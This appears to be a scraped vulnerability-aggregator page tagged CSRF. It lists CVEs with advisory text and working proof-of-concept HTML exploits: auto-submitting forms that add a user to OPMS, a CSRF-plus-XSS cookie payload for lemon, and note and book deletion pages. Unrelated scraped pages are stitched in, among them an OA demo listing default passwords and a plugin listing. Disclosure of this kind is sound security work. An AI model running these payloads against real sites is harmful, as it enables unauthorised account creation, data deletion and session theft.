The WP RSS Aggregator WordPress plugin before 4.19.3 does not sanitise and escape data before outputting it in the System Info admin dashboard, which could lead to a Stored XSS issue due to the wprss_dismiss_addon_notice AJAX action missing authorisation and CSRF checks, allowing any authenticated users, such as subscriber to call it and set a malicious payload in the addon parameter.

CVE-2021-24988

The WordPress Download Manager WordPress plugin before 3.2.22 does not sanitise and escape Template data before outputting it in various pages (such as admin dashboard and frontend). Due to the lack of authorisation and CSRF checks in the wpdm_save_template AJAX action, any authenticated users such as subscriber is able to call it and perform Cross-Site Scripting attacks

CVE-2021-24969

showdoc is vulnerable to Cross-Site Request Forgery (CSRF)

CVE-2021-4168

archivy is vulnerable to Cross-Site Request Forgery (CSRF)

**Title**

Missing CSRF token validation leads to note deletion.

**Summary**

Route `/dataobj/delete/<int:dataobj_id>` is responsible for note deletion. Instead of `POST` it accepts `GET` and `DELETE` methods.

    @app.route("/dataobj/delete/<int:dataobj_id>", methods=["DELETE", "GET"])
    def delete_data(dataobj_id):
        try:
            data.delete_item(dataobj_id)
        except BaseException:
            flash("Data could not be found!", "error")
            return redirect("/")
        flash("Data deleted!", "success")
        return redirect("/")
    

While they both contain CSRF tokens, in fact the token is not verified, so it is possible to exclude it from query which leads to CSRF.

**Steps to reproduce**

1.  1\. Create any note, get it's ID.
2.  2\. Run page from `PoC.html` with concrete ID in your browser, click the button.
3.  3\. Observe that the note with specified ID was deleted.

**Proof of Concept**

    // PoC.html
    <form action="http://127.0.0.1:5000/dataobj/delete/{yourNoteID}" method="GET">
    <input type="submit" value="Click me"/>
    </form>
    

**Possible remediation**

Use `POST` method instead and verify CSRF token.

**Impact**

This vulnerability is capable of deleting user's notes.

**Occurences**

CVE-2021-4162: Cross-Site Request Forgery (CSRF) in archivy

Zoho ManageEngine ServiceDesk Plus before 12003 allows authentication bypass in certain admin configurations.

CVE-2021-44526: ServiceDesk Plus readme | Service desk release notes | ServiceDesk Plus latest version read me notes | IT service management release notes | Service desk current version

A cross-site request forgery (CSRF) in Rockoa v1.9.8 allows an authenticated attacker to arbitrarily add an administrator account.

信呼OA在线演示

浏览次数(269137+18)，最后更新(2019-07-11 16:25:45)

欢迎使用在线演示。点击一下链接直接登录，建议使用火狐(Firefox)，谷歌(Chrome)，IE9.0+浏览器下演示。

帐号：admin(总管理员)

帐号：diaochan、xiaoqiao、daqiao、zhangfei、zhaozl(基础用户)

密码都是：123456

1、信呼管理后台演示【点我登录演示】，多单位版演示。

2、信呼OA移动端演示，【点我登录演示】

3、信呼APP演示，【去下载】

注：不得在系统上发布任何无聊信息。

原创文章，禁止转载复制，信呼OA官网保留一切知识产权。

*   ![](http://xinhu-1251238447.file.myqcloud.com/face/22_1045394184_s.jpg) 1楼 SVIP、 (2017-09-22 10:53:45) 
    
    好
    
*   ![](http://xinhu-1251238447.file.myqcloud.com/face/19_0959362481_s.jpg) 2楼 官网、 (2018-07-23 10:22:54) 
    
    自己顶一个
    
*   ![](http://xinhu-1251238447.file.myqcloud.com/face/24_1306287265_s.jpg) 3楼、 (2019-01-24 13:06:34) 
    
    能不能加入分红模式
    
*   ![](http://xinhu-1251238447.file.myqcloud.com/face/11_1343288660_s.png) 4楼、 (2020-03-11 14:11:23) 
    
    可以
    
*   ![](http://xinhu-1251238447.file.myqcloud.com/face/04_1734193685_s.gif) 5楼 SVIP、 (2020-06-04 17:34:24) 
    
    您这么厉害为什么还要二开呢？直接自己搭建你认为完美的框架不就好了！
    
*   ![](http://xinhu-1251238447.file.myqcloud.com/face/11_0913234472_s.png) 6楼、 (2020-06-11 09:13:27) 
    
    请问考核打分怎么生成，谢谢！
    
*   ![](http://xinhu-1251238447.file.myqcloud.com/face/21_2047241952_s.jpg) 7楼、 (2020-06-21 20:47:29) 
    
    公文管理模块 没有套红模板？
    
*   ![](http://xinhu-1251238447.file.myqcloud.com/face/07_1118117919_s.png) 8楼 SVIP、 (2021-01-07 11:18:18) 
    
    多单位 版 用什么账号 可以看到不同的 单位？
    
*   ![](http://xinhu-1251238447.file.myqcloud.com/face/20_1106097573_s.png) 9楼 SVIP、 (2021-02-20 11:06:15) 
    
    什么意思
    

**评论回复(9)**

CVE-2020-20593: 信呼OA在线演示_信呼

A cross-site request forgery (CSRF) in OPMS v1.3 and below allows attackers to arbitrarily add a user account via /user/add.

Place of backstage set up Organization management exists Csrf Vulnerability,attacker Structure a csrf payload,Once the administrator clicks on the malicious link, add a user

CSRF Exp:

    <html>
      
      <body>
      <script>history.pushState('', '', '/')</script>
        <form action="http://opms.demo.milu365.cn/user/add" method="POST">
          <input type="hidden" name="username" value="lisi" />
          <input type="hidden" name="password" value="a1234567" />
          <input type="hidden" name="depart" value="1462290164626094232" />
          <input type="hidden" name="position" value="1462292006260420932" />
          <input type="hidden" name="realname" value="lisi" />
          <input type="hidden" name="sex" value="1" />
          <input type="hidden" name="birth" value="2019&#45;10&#45;14" />
          <input type="hidden" name="email" value="123&#64;qq&#46;com" />
          <input type="hidden" name="webchat" value="" />
          <input type="hidden" name="qq" value="" />
          <input type="hidden" name="phone" value="13800138000" />
          <input type="hidden" name="tel" value="" />
          <input type="hidden" name="address" value="" />
          <input type="hidden" name="emercontact" value="lxr" />
          <input type="hidden" name="emerphone" value="13800138000" />
          <input type="hidden" name="id" value="0" />
          <input type="submit" value="Submit request" />
        </form>
      </body>
    </html>
    
    

We can construct the csrf code, so that after the webmaster clicks on the malicious link of the attacker, it will execute csrf, As long as the administrator visits can add user.  
![image](https://user-images.githubusercontent.com/45255270/66762589-e0994b00-eed8-11e9-9a72-8cf9171f7e63.png)  
![image](https://user-images.githubusercontent.com/45255270/66762611-e98a1c80-eed8-11e9-9fc8-d3e0bd58089a.png)

CVE-2020-20595: There is one CSRF vulnerability that can add the account  · Issue #25 · lock-upme/OPMS

A cross-site scripting (XSS) vulnerability in the Editing component of lemon V1.10.0 allows attackers to execute arbitrary web scripts or HTML.

Product Homepage: http://www.mossle.com/index.do  
Place of backstage exists Csrf Vulnerability,attacker Structure a csrf payload,Once the administrator clicks on the malicious link, the component information is automatically add.  
There is an xss in the place of Editing component

![1571127417546](https://user-images.githubusercontent.com/45255270/66828371-712c6580-ef83-11e9-8c0f-e7c0c666bcb2.png)

We can write an xss first, and then construct the csrf code, so that after the account clicks on the malicious link of the attacker, it will execute csrf, and the website will have an xss. As long as the account visits the page , he can get him Cookie

**Csrf Exp:**

    <html>
      
      <body>
      <script>history.pushState('', '', '/')</script>
        <form action="http://www.mossle.com/portal/save.do" method="POST">
          <input type="hidden" name="portalWidgetId" value="5557079425024" />
          <input type="hidden" name="portalItemName" value="&lt;img&#32;src&#61;x&#32;onerror&#61;alert&#40;&apos;cookie&apos;&#41;&gt;" />
          <input type="submit" value="Submit request" />
        </form>
      </body>
    </html>
    

![1571127847476](https://user-images.githubusercontent.com/45255270/66828450-a20c9a80-ef83-11e9-8435-86e98b273557.png)

CVE-2020-20598: Csrf + Xss combination Can be obtained user cookie · Issue #199 · xuhuisheng/lemon

Cross-Site Request Forgery (CSRF) vulnerability discovered in Contact Form 7 Database Addon – CFDB7 WordPress plugin (versions <= 1.2.5.9).

*   Details
*   Reviews
*   Installation
*   Support
*   Development

The “CFDB7” plugin saves contact form 7 submissions to your WordPress database. Export the data to a CSV file.  
By simply installing the plugin, it will automatically begin to capture form submissions from contact form 7.

**Features of CFDB 7**

*   No configuration is needed
*   Save Contact Form 7 form submitted data to the database.
*   Single database table for all contact form 7 forms
*   Easy to use and lightweight plugin
*   Developer friendly & easy to customize
*   Display all created contact form 7 form list.
*   Export CF7 DB (CF7 Database – cf7db) data in CSV file

**Pro Addons**

*   CFDB7 DB Switcher  
    Connect CFDB7 to an external database or another DB
*   Drag & Drop File Upload  
    Contact form 7 drag and drop files upload plugin.
*   Already Submitted?  
    Trigger error if a field is already submitted
*   CF7 Repeater  
    CF7 Repeater plugin allows creating one or more field dynamically
*   Popup Message  
    Replace your validation and success messages into beautiful popup message to attract visitors.
*   Export PDF File  
    Easy to export contact forms from database to PDF file

Support : http://www.ciphercoin.com/contact/  
Extensions : Contact form 7 more Add-ons

*   ![](https://ps.w.org/contact-form-cfdb7/assets/screenshot-1.png?rev=1619872)
    
    Admin
    

1.  Download and extract plugin files to a wp-content/plugin directory.
2.  Activate the plugin through the WordPress admin interface.
3.  Done !

![](https://secure.gravatar.com/avatar/a9279bbb4218ff7881d2e40ef42c9037?s=60&d=retro&r=g)

![](https://secure.gravatar.com/avatar/ffd294ab5833ba14aaf175f9acc71cc4?s=60&d=retro&r=g)

![](https://secure.gravatar.com/avatar/70efbf3d754a75d90b14120c5951ed94?s=60&d=retro&r=g)

Esay to use and well supported

![](https://secure.gravatar.com/avatar/1e781ae1fe6e10699cac80a05a168ad2?s=60&d=retro&r=g)

it does work to meet my needs

![](https://secure.gravatar.com/avatar/88eaf734e5466956afb73ba2d098761a?s=60&d=retro&r=g)

Great plugin to backup and/or data mine all the stuff that goes through your forms.

![](https://secure.gravatar.com/avatar/494c9f9d25aaaebc987038ce82b2631b?s=60&d=retro&r=g)

I use it regulary, well maintenained, robust, and efficient.

Read all 1,488 reviews

“Contact Form 7 Database Addon – CFDB7” is open source software. The following people have contributed to this plugin.

Contributors

*   ![](https://secure.gravatar.com/avatar/7f1a7538efed0daf7318b5cf3044b812?s=32&d=mm&r=g) Arshid

**1.2.6.2**

Fixed xss issues

**1.2.6.1**

Fixed nonce issue

**1.2.5.9**

Fixed upload issue

**1.2.5.8**

This is a security and maintenance release and we strongly encourage you to update to it immediately.

**1.2.5.4**

Input sanitization

**1.2.5.3**

Add index.php in cfdb7\_uploads

**1.2.5**

Fixed minar file upload bug  
Meaningfull headings

**1.2.4.11**

UTF-8 CSV Export Fixed

**1.0.0**

First version of plugin.

CVE-2021-36886: Contact Form 7 Database Addon – CFDB7

In ProjectWorlds Online Book Store PHP 1.0 a CSRF vulnerability in admin_delete.php allows a remote attacker to delete any book.

**Author**

KhanhCM (@khanhchauminh)

**Version: 1.0****Details**

The GET request for deleting a book with `ISBN=12345` looks like this:

    http://127.0.0.1:8888/admin_delete.php?bookisbn=12345
    

Changing the value of the `bookisbn` parameter under admin privilege will delete the book with that ISBN.  
A remote attacker can embed the request into an innocent-looking hyperlink:

    <a href="http://127.0.0.1:8888/admin_delete.php?bookisbn=12345">View</a>
    

**Step to reproduce**

1.  First, create a malicious HTML page then host a website containing that page.

**PoC:**

    <html>
    <head>
      <title>CSRF PoC</title>
    </head>
    <body>
      <p>CSRF PoC</p>
      <a id='link' href="http://127.0.0.1:8888/admin_delete.php?bookisbn=12345">View</a>
      <script>
        document.getElementById('link').click();
      </script>
    </body>
    </html>
    

2.  Entice the admin to click on the link to the malicious site. When the admin browses to that site, the link would be automatically clicked via JavaScript and the book will be deleted.

**Response in Burpsuite**

![image](https://user-images.githubusercontent.com/48460056/139569472-97b2722a-9400-41b4-92fa-a05baed014c4.png)  
![image](https://user-images.githubusercontent.com/48460056/139569481-f387a38c-8e28-439b-8607-b16f3332ea13.png)

**Source code review****admin\_delete.php**

![image](https://user-images.githubusercontent.com/48460056/140685852-5f2252c3-69b6-4b46-9339-21e06ed04c7a.png)

**Remediation**

Implement an Anti-CSRF Token.

CVE-2021-43156: CSRF vulnerability in admin_delete.php allows a remote attacker to delete any book · Issue #19 · projectworldsofficial/online-book-store-project-in-php

Tag

#csrf